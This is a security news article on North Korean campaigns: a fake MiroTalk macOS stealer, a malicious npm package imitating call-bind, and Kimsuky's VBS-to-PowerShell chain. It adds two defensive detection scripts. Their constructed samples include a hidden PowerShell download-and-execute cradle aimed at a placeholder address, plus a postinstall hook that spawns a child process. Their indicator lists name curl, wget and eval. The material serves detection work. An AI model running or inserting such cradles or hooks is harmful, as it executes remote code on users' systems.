North Korean Hackers Update BeaverTail Malware to Target macOS Users
Security researchers have uncovered an updated version of a known information stealer that threat actors linked to the Democratic People's Republic of Korea (DPRK) have used in past cyber espionage campaigns targeting job seekers.
The artifact in question is an Apple macOS disk image (DMG) file named "MiroTalk.dmg" that masquerades as the legitimate video calling service of the same name but in reality serves as a conduit to deliver a native version of BeaverTail, security researcher Patrick Wardle said.
BeaverTail is the name of a JavaScript information stealer that was first documented by Palo Alto Networks Unit 42 in November 2023 as part of a campaign dubbed Contagious Interview, which aims to infect software developers with malware under the guise of a job interview process. Securonix tracks the same activity under the name DEV#POPPER.
Besides harvesting sensitive data from web browsers and cryptocurrency wallets, the malware can drop additional payloads such as InvisibleFerret, a Python backdoor that is responsible for downloading AnyDesk to maintain persistent remote access.

While BeaverTail has previously been distributed through bogus npm packages hosted on GitHub and the npm package registry, the latest findings mark a shift in the delivery vector.
"If I had to speculate, the DPRK cybercriminals likely approached their possible targets, urging them to participate in a hiring meeting, by downloading and executing the (infected version of) MiroTalk hosted on mirotalk[.]net," Wardle said.
An analysis of the unsigned DMG file shows that it facilitates the theft of data from web browsers such as Google Chrome, Brave and Opera, from cryptocurrency wallets, and from iCloud Keychain. It is also designed to download and execute additional Python scripts from a remote server (i.e., InvisibleFerret). Because the image is unsigned, Gatekeeper will not run the application it contains unless the victim explicitly overrides the block, so the infection still hinges on the target following the attacker's instructions; running `codesign -dv` or `spctl --assess` against the bundle is enough to confirm the missing signature.
"The DPRK cybercriminals are a crafty group and are quite skilled at compromising macOS targets, even though their method frequently relies on social engineering (and thus from a technical perspective are somewhat unremarkable)," Wardle said.
The disclosure comes as Phylum uncovered a new malicious npm package named call-blockflow that is nearly identical to the legitimate call-bind library but incorporates complex functionality to download a remote binary while taking deliberate steps to evade detection.
"In this attack, although the call-bind package has not been compromised, the weaponized call-blockflow package appropriates all the credibility and legitimacy of the original to enhance the attack's success," the company said in a statement shared with The Hacker News.
The package, believed to be the work of the North Korea-linked Lazarus Group, was removed about 90 minutes after it was uploaded to npm and was downloaded a total of 18 times. Evidence suggests the campaign, which spans more than three dozen malicious packages, has been running intermittently since September 2023.
"Subsequent to installation, these packages would fetch a remote file, decrypt it, execute an exported function from it, and then meticulously erase their tracks by deleting and renaming files," the software supply chain security firm said. "This left the package directory in a seemingly benign state after installation."
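The behaviour Phylum describes (an install hook that fetches, decrypts and runs remote code, inside a package whose metadata is lifted from a legitimate one) is exactly what an install-time audit of `package.json` files can surface before `npm install` runs it. The script below is an added example for this article, not Phylum's tooling and not a reproduction of the real call-blockflow package: the suspicious-token list, the lifecycle hook list and the sample manifests are constructed assumptions (only the call-bind repository URL is the real one). It flags three things: any lifecycle hook npm runs automatically, hook bodies that download or evaluate code, and a `repository` field that names a different package than `name`.

```python
"""Audit npm manifests for install-time hooks and borrowed package identity.

Added example for this article; it is not Phylum's tooling and does not reproduce
the real call-blockflow package. It applies three heuristics to each package.json:
  1. lifecycle hooks (preinstall/install/postinstall/prepare) that npm runs automatically,
  2. hook bodies that fetch or evaluate code (the token list below is an assumption),
  3. repository metadata naming a package other than `name` (copied from the impersonated one).
"""
from __future__ import annotations

import json
from pathlib import Path
from urllib.parse import urlparse

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Fragments that make an install hook worth a human look (assumed indicator list, not exhaustive).
SUSPICIOUS_TOKENS = (
    "node -e", "curl ", "wget ", "http://", "https://", "child_process",
    "eval(", "new Function", "Buffer.from(", "createDecipher",
)


def _repo_slug(url: str) -> str:
    """Last path component of a repository URL without .git ('.../call-bind.git' -> 'call-bind')."""
    path = urlparse(url).path.rstrip("/")
    slug = path.rsplit("/", 1)[-1]
    return slug[:-4] if slug.endswith(".git") else slug


def audit_manifest(pkg: dict) -> list[str]:
    """Return human-readable findings for one parsed package.json (empty list = nothing notable)."""
    findings: list[str] = []
    name = pkg.get("name", "<unnamed>")
    scripts = pkg.get("scripts") or {}

    for hook in LIFECYCLE_HOOKS:
        body = scripts.get(hook)
        if not body:
            continue
        findings.append(f"{name}: declares '{hook}' hook: {body!r}")
        hits = [t for t in SUSPICIOUS_TOKENS if t in body]
        if hits:
            findings.append(f"{name}: '{hook}' hook contains {', '.join(repr(h) for h in hits)}")

    repo = pkg.get("repository")
    if isinstance(repo, dict):
        repo = repo.get("url", "")
    if repo:
        slug = _repo_slug(repo)
        bare = name.rsplit("/", 1)[-1]  # drop an @scope/ prefix
        if slug and slug != bare:
            findings.append(f"{name}: repository points at '{slug}', not '{bare}' (copied metadata?)")
    return findings


def audit_tree(manifests: dict[str, dict]) -> dict[str, list[str]]:
    """Audit many manifests; keep only packages that produced findings."""
    result: dict[str, list[str]] = {}
    for pkg_name, manifest in manifests.items():
        findings = audit_manifest(manifest)
        if findings:
            result[pkg_name] = findings
    return result


def load_node_modules(root: str | Path) -> dict[str, dict]:
    """Read every node_modules/**/package.json under root (scoped packages included)."""
    manifests: dict[str, dict] = {}
    for path in Path(root).glob("node_modules/**/package.json"):
        try:
            manifest = json.loads(path.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue
        if isinstance(manifest, dict) and "name" in manifest:
            manifests[manifest["name"]] = manifest
    return manifests


# Constructed sample manifests: the call-bind repository URL is its real one, but the
# call-blockflow entry is illustrative and not the contents of the actual malicious package.
SAMPLE_MANIFESTS = {
    "call-bind": {
        "name": "call-bind",
        "version": "1.0.7",
        "repository": {"type": "git", "url": "git+https://github.com/ljharb/call-bind.git"},
        "scripts": {"test": "npm run tests-only"},
    },
    "call-blockflow": {
        "name": "call-blockflow",
        "version": "1.0.7",
        "repository": {"type": "git", "url": "git+https://github.com/ljharb/call-bind.git"},
        "scripts": {
            "test": "npm run tests-only",
            "postinstall": "node -e \"require('child_process').execSync('node lib/setup.js')\"",
        },
    },
    "left-pad": {"name": "left-pad", "version": "1.3.0", "scripts": {"test": "node test"}},
}

if __name__ == "__main__":
    for pkg_name, findings in audit_tree(SAMPLE_MANIFESTS).items():
        print(pkg_name)
        for line in findings:
            print("  -", line)
```

In practice, install with `npm install --ignore-scripts`, run `audit_tree(load_node_modules("."))` over the resulting tree, and only then decide which hooks to allow. The audit has to happen on the unpacked tarball rather than after a normal install, because, as Phylum notes, a hook that deletes and renames its own files leaves nothing to inspect afterwards.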
The disclosure also follows a warning from JPCERT/CC about cyber attacks orchestrated by the North Korean Kimsuky group against Japanese organizations.
The infection chain begins with phishing emails impersonating security and diplomatic organizations and carrying a malicious executable that, when run, downloads a Visual Basic Script (VBS), which in turn retrieves a PowerShell script to collect user account, system and network information and to enumerate files and processes.
The collected information is then sent to a command-and-control (C2) server, which responds with a second VBS file that is executed to fetch and run a PowerShell-based keylogger dubbed InfoKey.
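The chain above (executable from a phishing lure, then wscript.exe running a VBS, then powershell.exe pulling the next stage) leaves a distinctive parent-child signature in process-creation telemetry. The script below is an added example for this article, not JPCERT/CC's detection content: it walks Sysmon-style process-creation records (field names ProcessId, ParentProcessId, Image, CommandLine are an assumption), reports every powershell.exe whose parent is a script host, and raises severity when the script host was itself launched from a user-writable directory or the PowerShell command line carries a download cradle, an encoded command, or hidden-window flags. The indicator lists and the sample events, including the 203.0.113.5 address, are constructed.

```python
"""Flag the executable -> script host -> PowerShell chain in process-creation logs.

Added example for this article, not JPCERT/CC's own detection content. Input is a list of
Sysmon-style process-creation records (assumed fields: ProcessId, ParentProcessId, Image,
CommandLine); the sample events at the bottom are constructed for illustration.
"""
from __future__ import annotations

import re

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")

# Directories an unprivileged user can write to; a parent binary here is a lure, not an installed product (assumed list).
USER_WRITABLE = ("\\downloads\\", "\\appdata\\local\\temp\\", "\\temp\\", "\\users\\public\\")

CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\birm\b|net\.webclient|invoke-expression|\biex\b",
    re.I,
)
ENCODED_RE = re.compile(r"\s-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)
STEALTH_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile|executionpolicy\s+bypass", re.I)


def _base(image: str) -> str:
    """Lower-cased file name of an image path."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_script_host_chains(events: list[dict]) -> list[dict]:
    """Return one alert per powershell.exe whose parent is wscript.exe or cscript.exe.

    Every such launch is reported because it is rare outside logon scripts; the extra
    indicators below raise severity from 'medium' to 'high'.
    """
    by_pid = {e["ProcessId"]: e for e in events}
    alerts = []
    for e in events:
        if _base(e["Image"]) != "powershell.exe":
            continue
        parent = by_pid.get(e["ParentProcessId"])
        if parent is None or _base(parent["Image"]) not in SCRIPT_HOSTS:
            continue
        grand = by_pid.get(parent["ParentProcessId"])
        cmd = e.get("CommandLine", "")
        reasons = [f"powershell.exe spawned by {_base(parent['Image'])}"]
        if grand and any(d in grand["Image"].lower() for d in USER_WRITABLE):
            reasons.append(f"script host launched by binary in user-writable path: {grand['Image']}")
        if CRADLE_RE.search(cmd):
            reasons.append("download cradle in PowerShell command line")
        if ENCODED_RE.search(cmd):
            reasons.append("encoded PowerShell command")
        if STEALTH_RE.search(cmd):
            reasons.append("hidden window / no profile / execution-policy bypass")
        chain = " -> ".join(_base(p["Image"]) for p in (grand, parent, e) if p)
        alerts.append({
            "ProcessId": e["ProcessId"],
            "chain": chain,
            "severity": "high" if len(reasons) > 1 else "medium",
            "reasons": reasons,
        })
    return alerts


# Constructed sample events (not real telemetry); PIDs, user name and address are illustrative.
SAMPLE_EVENTS = [
    {"ProcessId": 800, "ParentProcessId": 600, "Image": "C:\\Windows\\explorer.exe",
     "CommandLine": "explorer.exe"},
    # Lure: a downloaded executable drops a VBS and runs it through wscript.exe
    {"ProcessId": 5232, "ParentProcessId": 800, "Image": "C:\\Users\\alice\\Downloads\\invitation.exe",
     "CommandLine": "\"C:\\Users\\alice\\Downloads\\invitation.exe\""},
    {"ProcessId": 5300, "ParentProcessId": 5232, "Image": "C:\\Windows\\System32\\wscript.exe",
     "CommandLine": "wscript.exe C:\\Users\\alice\\AppData\\Local\\Temp\\stage1.vbs"},
    {"ProcessId": 5388, "ParentProcessId": 5300,
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/s.ps1')\""},
    # Logon script: wscript.exe started by explorer runs a plain PowerShell file from a share
    {"ProcessId": 6000, "ParentProcessId": 800, "Image": "C:\\Windows\\System32\\wscript.exe",
     "CommandLine": "wscript.exe \\\\fileserver\\netlogon\\inventory.vbs"},
    {"ProcessId": 6010, "ParentProcessId": 6000,
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -File \\\\fileserver\\netlogon\\inventory.ps1"},
    # Build job: cmd.exe -> powershell.exe is outside this rule
    {"ProcessId": 7000, "ParentProcessId": 800, "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c build.bat"},
    {"ProcessId": 7010, "ParentProcessId": 7000,
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\build\\package.ps1"},
]

if __name__ == "__main__":
    for alert in find_script_host_chains(SAMPLE_EVENTS):
        print(alert["severity"].upper(), alert["chain"])
        for reason in alert["reasons"]:
            print("  -", reason)
```

The second stage in the JPCERT/CC chain (a VBS returned by the C2 that launches the PowerShell keylogger) trips the same rule again, this time with powershell.exe as the grandparent; adding powershell.exe to the list of suspicious grandparents is a natural extension. The logon-script case is kept in the sample to show why the rule reports at medium rather than suppressing script-host launches outright: the command-line and path indicators, not the parent alone, separate the two.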
"Even though there have been limited reports of attack endeavors by Kimsuky aiming at organizations in Japan, there is a likelihood that Japan is also under active targeting," JPCERT/CC said.
